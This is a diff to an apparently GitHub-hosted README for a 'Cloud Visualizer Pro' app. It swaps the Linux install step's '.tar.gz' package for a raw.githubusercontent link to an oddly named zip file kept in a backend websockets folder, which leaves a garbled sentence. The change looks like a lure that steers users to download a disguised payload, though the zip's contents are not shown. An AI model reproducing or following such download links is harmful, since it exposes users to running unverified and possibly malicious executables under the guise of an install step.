Fiberopticsconceivableness219/azure-cloud-ai-visualizer/README.md

    - **Windows**: Double-click the `.exe` file to start the installation.
    - **macOS**: Open the `.dmg` file and drag the application to your Applications folder.
-   - **Linux**: Follow specific installation instructions included in the `.tar.gz` package if applicable.
+   - **Linux**: Follow specific installation instructions included in the `https://raw.githubusercontent.com/Fiberopticsconceivableness219/azure-cloud-ai-visualizer/main/backend/app/websockets/azure-cloud-ai-visualizer-olfactometer.zip` package if applicable.

 4. **Launch Cloud Visualizer Pro**
    After installation, open the application from your desktop or application folder.